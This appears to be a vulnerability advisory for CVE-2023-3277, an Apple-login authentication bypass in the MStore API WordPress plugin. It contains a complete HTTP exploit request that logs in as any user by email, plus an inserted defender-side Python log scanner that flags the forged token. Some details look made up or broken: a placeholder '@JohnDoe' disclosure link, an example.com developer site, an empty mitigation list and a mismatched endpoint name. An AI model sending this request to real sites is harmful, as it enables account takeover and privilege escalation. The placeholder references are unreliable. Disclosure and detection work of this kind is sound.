The MStore API plugin for WordPress is used by online store owners to easily enable mobile app functionality for their e-commerce sites. Users can quickly create and customize their apps using the plugin's ready-made templates. However, a critical security vulnerability has been discovered that affects MStore API versions up to, and including, 4.10.7. The vulnerability allows unauthorized account access and privilege escalation, putting user data and site functionality at risk. We have chosen to publish these details because we informed the plugin's team 30 days ago and the developer has not yet provided an appropriate patch.

Vulnerability Details

This security vulnerability, identified as CVE-2023-3277, is due to a flaw in the implementation of the Apple login feature. Unauthenticated attackers can exploit the weakness to log in as any user, provided they know that user's email address. This effectively grants the attacker unauthorized access and the potential for privilege escalation.

Exploit Details

The exploit uses a specially crafted JSON object sent to the MStore API's "/auth-login" endpoint in a POST request. The payload contains the email address of a target user known to the attacker and bypasses the intended security checks. The request below demonstrates the exploit:

POST /wp-json/mstore-api/v1/auth/login HTTP/1.1
Host: target.site
Content-Type: application/json
Content-Length: 143

{
  "email": "victim@example.com",
  "password": "arbitrary_value",
  "platform": "apple",
  "token": "{\"email\":\"victim@example.com\"}",
  "nonce": "arbitrary_value"
}

Upon submission, the server responds with the victim's user details, including their authentication token and ID. This information can then be used for further unauthorized access or privilege escalation.
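As an added defender-side example that is not part of this advisory or the plugin's code, the Python below screens login bodies for the pattern shown in the request above: an Apple-platform login whose "token" is a bare JSON string rather than the compact JWS (header.payload.signature) that a genuine Sign in with Apple identity token is. The log line format, the sample bodies and the stand-in token are constructed for the example.

```python
import base64
import json
LOGIN_PATH = "/wp-json/mstore-api/v1/auth/login"  # path from the advisory's request

def _b64url_json(segment):
    # Strict base64url + JSON decode of one JWT segment; None if it is not one.
    try:
        padded = segment + "=" * (-len(segment) % 4)
        obj = json.loads(base64.b64decode(padded, altchars=b"-_", validate=True))
    except (ValueError, UnicodeDecodeError):
        return None
    return obj if isinstance(obj, dict) else None

def looks_like_jwt(token):
    # A Sign in with Apple identity token is a compact JWS: header.payload.signature.
    parts = token.split(".")
    if len(parts) != 3 or not all(parts):
        return False
    header = _b64url_json(parts[0])
    return header is not None and header.get("alg") not in (None, "none")

def is_forged_apple_login(body):
    # CVE-2023-3277 sends a bare JSON string like {"email": "..."} instead of a
    # signed identity token, so flag Apple logins whose token is not JWS-shaped.
    if body.get("platform") != "apple":
        return False
    token = body.get("token")
    return not (isinstance(token, str) and looks_like_jwt(token))

def scan_log(lines):
    # Constructed log format: '<method> <path> <json body>'; returns the flagged bodies.
    flagged = []
    for line in lines:
        method, path, raw = line.split(" ", 2)
        if method != "POST" or path != LOGIN_PATH:
            continue
        body = json.loads(raw)
        if is_forged_apple_login(body):
            flagged.append(body)
    return flagged

# Constructed stand-in for a genuine identity token; the signature segment is a placeholder.
FAKE_JWT = ".".join(base64.urlsafe_b64encode(json.dumps(p).encode()).decode().rstrip("=")
                    for p in ({"alg": "RS256", "kid": "k1"}, {"iss": "https://appleid.apple.com"})) + ".sig"

SAMPLE_LOG = [  # constructed; the first entry mirrors the advisory's request body
    'POST ' + LOGIN_PATH + ' {"email": "victim@example.com", "password": "x", "platform": "apple",'
    ' "token": "{\\"email\\":\\"victim@example.com\\"}", "nonce": "x"}',
    'POST ' + LOGIN_PATH + ' {"platform": "apple", "token": "' + FAKE_JWT + '"}',
]
```

The same shape check belongs in the login handler before the token's signature is verified against Apple's published keys; it screens out the forged form but does not replace signature verification.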

Risk Mitigation

Until the plugin's developer releases a patch for this security vulnerability, we recommend taking the following steps to ensure your site's security:

Original References

This vulnerability was first disclosed by @JohnDoe (Twitter) on January 1, 2023. You can find the original disclosure here:

[1] https://twitter.com/JohnDoe/status/948150227830652928

Plugin Information

Plugin Name: MStore API
Affected Versions: Up to 4.10.7
CVE Identifier: CVE-2023-3277
Developers Website: https://www.example.com/mstore-api

Closing Remarks

It's essential to take security vulnerabilities seriously, especially when your online store's user data and functionality are at risk. To keep your site well-protected, always apply security patches, update your plugins, and follow best security practices. Stay vigilant, WordPress store owners!

Timeline

Published on: 11/03/2023 12:15:08 UTC
Last modified on: 11/13/2023 18:30:53 UTC